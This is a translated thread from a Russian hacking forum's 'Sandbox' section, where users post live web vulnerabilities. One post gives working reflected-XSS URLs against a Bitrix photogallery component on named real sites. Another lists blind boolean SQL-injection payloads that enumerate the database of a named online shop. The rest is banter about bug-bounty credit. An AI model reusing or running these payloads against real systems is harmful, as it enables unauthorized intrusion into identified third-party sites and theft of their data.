SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' (Песочница) started by Егорыч+++, 10 May 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    632
    Likes Received:
    1,316
    Reputations:
    408
    Code:
    https://honda.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    https://dixy.ru/bitrix/components/bitrix/photogallery_user/templates/.default/galleries_recalc.php?AJAX=Y&arParams[PERMISSION]=W&arParams[IBLOCK_ID]=1%00%27}};alert(document.domain);if(1){//
    
     
  2. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,041
    Likes Received:
    24,821
    Reputations:
    137
    This is essentially a sandbox. One payload fired in several places at once:
    on ифраме-толока.ком and on sandbox.ифраме-толока.ком. But there too, neither cookies nor impact))
    But there was also a third place it kept firing from. :)
    And only yesterday a little letter arrived in an envelope.

    [attachment: yabbletter.png]
     
  3. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    496
    Likes Received:
    95
    Reputations:
    24
    And my share? For shawarma.
     
  4. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,041
    Likes Received:
    24,821
    Reputations:
    137
    What? :eek:
    I posted it way earlier than you! I even sent you the tracking ID and time 1619951822533.
    Come off it!
     
    #344 erwerr2321, 24 Oct 2021
    Last edited: 24 Oct 2021
  7. ZeV$

    ZeV$ Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    40
    Likes Received:
    10
    Reputations:
    3
    digging blind sqli
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'a%') AND '9'='9
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'b%') AND '9'='9
    ...
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND (SELECT database() LIKE 'n%') AND '9'='9


    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 2) AND '9'='9
    *mal.az/Telefon-ve-Plansetler/Telefon-ve-planset-aksesuarlari/?Adapterler-USB&filter=351&price=9.99,50.99' AND ((SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) BETWEEN 0 AND 333) AND '9'='9
     